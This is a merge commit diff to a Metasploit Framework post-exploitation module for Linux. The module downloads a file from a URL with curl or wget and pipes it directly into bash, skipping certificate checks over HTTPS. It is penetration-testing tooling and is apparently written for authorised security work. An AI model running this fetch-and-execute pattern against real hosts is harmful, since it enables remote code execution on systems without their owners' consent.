Merge branch 'download_exec_wget' of https://github.com/dougsko/metasploit-framework into dougsko-download_exec_wget

jvazquez-r7 · jvazquez-r7 · commit 47ea8aea3011 · 2013-03-21T17:09:20.000+01:00
diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb
@@ -18,12 +18,13 @@ class Metasploit3 < Msf::Post
 	include Msf::Post::File
 	include Msf::Post::Linux::System
 
-
 	def initialize(info={})
 		super( update_info( info,
-			'Name'          => 'Linux Download Exec',
+			'Name'          => 'Linux Manage Download and Exececute',
 			'Description'   => %q{
-				This module downloads and runs a file with bash. It uses curl and bash from the PATH.
+					This module downloads and runs a file with bash. It first tries to uses curl as
+				its HTTP client and then wget if it's not found. Bash found in the PATH is used to
+				execute the file.
 			},
 			'License'       => MSF_LICENSE,
 			'Author'        =>
@@ -35,14 +36,23 @@ def initialize(info={})
 		))
 
 		register_options(
-		[
-			OptString.new('URL', [true, 'Full URL of file to download.'])
-		], self.class)
+			[
+				OptString.new('URL', [true, 'Full URL of file to download.'])
+			], self.class)
 
 	end
 
+	def cmd_exec_vprint(cmd)
+		vprint_status("Executing: #{cmd}")
+		output = cmd_exec(cmd)
+		if output.length > 0
+			vprint_status("#{output}")
+		end
+		return
+	end
+
 	def exists_exe?(exe)
-		path = expand_path("$PATH")
+		path = expand_path(ENV['PATH'])
 		if path.nil? or path.empty?
 			return false
 		end
@@ -54,28 +64,40 @@ def exists_exe?(exe)
 		return false
 	end
 
-	def run
+	def search_http_client
 		print_status("Checking if curl exists in the path...")
 		if exists_exe?("curl")
-			print_good("curl available, going ahead...")
-		else
-			print_warning("curl not available on the $PATH, aborting...")
+			print_good("curl available, using it")
+			@stdout_option = ""
+			@http_client = "curl"
+			@ssl_option = "-k"
 			return
 		end
 
-		if datastore['URL'].match(/https/)
-			cmd_exec_vprint("`which curl` -k #{datastore['URL']} 2>/dev/null | `which bash` ")
-		else
-			cmd_exec_vprint("`which curl` #{datastore['URL']} 2>/dev/null | `which bash` ")
+		print_status("Checking if wget exists in the path...")
+		if exists_exe?("wget")
+			print_good("wget available, using it")
+			@http_client = "wget"
+			@stdout_option =  "-O-"
+			@ssl_option = "--no-check-certificate"
+			return
 		end
+
 	end
 
-	def cmd_exec_vprint(cmd)
-		vprint_status("Executing: #{cmd}")
-		output = cmd_exec(cmd)
-		if output.length > 0
-			vprint_status("#{output}")
+	def run
+		search_http_client
+
+		if not @http_client
+			print_warning("neither curl nor wget available in the $PATH, aborting...")
+			return
+		end
+
+		if datastore['URL'].match(/https/)
+			cmd_exec_vprint("`which #{@http_client}` #{@stdout_option} #{@ssl_option} #{datastore['URL']} 2>/dev/null | `which bash` ")
+		else
+			cmd_exec_vprint("`which #{@http_client}` #{@stdout_option} #{datastore['URL']} 2>/dev/null | `which bash` ")
 		end
-		return
 	end
+
 end
